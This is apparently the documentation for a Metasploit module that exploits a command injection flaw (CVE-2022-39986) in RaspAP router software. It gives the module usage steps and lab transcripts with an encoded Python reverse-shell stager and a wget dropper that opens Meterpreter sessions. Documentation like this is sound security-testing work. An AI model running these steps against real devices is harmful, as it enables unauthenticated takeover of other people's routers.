## Vulnerable Application

RaspAP is feature-rich wireless router software that just works
on many popular Debian-based devices, including the Raspberry Pi.

A Command injection vulnerability in RaspAP versions 2.8.0 thru 2.8.7 allows
unauthenticated attackers to execute arbitrary commands via the cfg_id
parameter in /ajax/openvpn/activate_ovpncfg.php and /ajax/openvpn/del_ovpncfg.php.

This Metasploit exploit module targets a command injection vulnerability (CVE-2022-39986) in RaspAP's web-gui PHP project,
The vulnerability affects versions of `RaspAP` between `2.8.0` and `2.8.7`. By exploiting this flaw, an attacker can execute
arbitrary commands in the context of the user running RaspAP. This issue was discovered and reported by Ismael0x00.
Check [here](https://medium.com/@ismael0x00/multiple-vulnerabilities-in-raspap-3c35e78809f2) for the original writeup.

## Testing
For installing the vulnerable version follow the steps below,
1. Follow the manual installation steps given [here](https://docs.raspap.com/manual/)
2. After setting up the service, navigate to the `/var/www/html` directory
3. Do `git checkout 2.8.0` for switching to the vulnerable version

**Note: Project can also be installed inside a ubuntu/debian docker containers**

## Verification Steps

1. msfconsole
2. Do: `use exploit/unix/http/raspap_rce`
3. Do: `set RHOST [IP]`
4. Do: `set RPORT [PORT]`
5. Do: `check`

## Options

## Scenarios

### Debian 12, Unix Command Target
```
msf6 > use exploit/unix/http/raspap_rce 
[*] Using configured payload cmd/unix/reverse_bash
msf6 exploit(unix/http/raspap_rce) > set rhosts 172.16.199.130
rhosts => 172.16.199.130
msf6 exploit(unix/http/raspap_rce) > set lhost 172.16.199.1
lhost => 172.16.199.1
msf6 exploit(unix/http/raspap_rce) > run

[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Executing Unix Command with echo exec\(__import__\(\'zlib\'\).decompress\(__import__\(\'base64\'\).b64decode\(__import__\(\'codecs\'\).getencoder\(\'utf-8\'\)\(\'eNo9UE1LxDAQPTe/IrckGMNmqZVdrCDiQUQEd28i0iajhqZpSLJaFf+7DVmcwwxv5s2bDzP6KSQcJzVA4t/W9LzvIjQ1jykcVOLJjIBep4BnbBwOnXsDKldsi6oUvhZfxbY0ixLomh/x7uH67mW3f7y5umeZJ9TkHKhEKZHnayEbITcbIQmvF2OZ0gfoBlTBrMCnrJ2Hi2gBPD1jyLZlJ3FwvlMDJZe3hEcRQH3QReBp9Yx0e8SWoc93YwFbcFSzC7vI6ZP/6mlJMwQzKJrPFhrUNPoAMdLyAdE3dU5qyEz+QyLZxl+G/gDVz18D\'\)\[0\]\)\)\) | exec $(which python || which python3 || which python2) -
[*] Sending stage (24772 bytes) to 172.16.199.130
[*] Meterpreter session 1 opened (172.16.199.1:4444 -> 172.16.199.130:48494) at 2023-08-14 20:38:21 -0400

meterpreter > getuid
Server username: www-data
meterpreter > sysinfo
Computer     : debian
OS           : Linux 6.1.0-10-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.38-2 (2023-07-27)
Architecture : x64
Meterpreter  : python/linux
meterpreter > 
```

### Debian 11, Linux Dropper Target
```
msf6 > use exploit/unix/http/raspap_rce 
[*] Using configured payload cmd/unix/reverse_bash
msf6 exploit(unix/http/raspap_rce) > set rhosts 127.0.0.1
rhosts => 127.0.0.1
msf6 exploit(unix/http/raspap_rce) > set lhost 172.17.0.1
lhost => 172.17.0.1
msf6 exploit(unix/http/raspap_rce) > set target 1
target => 1
msf6 exploit(unix/http/raspap_rce) > run

[*] Started reverse TCP handler on 172.17.0.1:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Executing Linux Dropper
[*] Using URL: http://172.17.0.1:8080/cH0NvADRgGYZoL
[*] Client 172.17.0.2 (Wget/1.21) requested /cH0NvADRgGYZoL
[*] Sending payload to 172.17.0.2 (Wget/1.21)
[*] Sending stage (3045380 bytes) to 172.17.0.2
[*] Meterpreter session 1 opened (172.17.0.1:4444 -> 172.17.0.2:48940) at 2023-08-10 00:37:27 +0200
[*] Command Stager progress - 100.00% done (117/117 bytes)
[*] Server stopped.

meterpreter > getuid 
Server username: www-data
meterpreter > sysinfo 
Computer     : 172.17.0.2
OS           : Debian 11.6 (Linux 6.4.7-hardened1-2-hardened)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > 
```
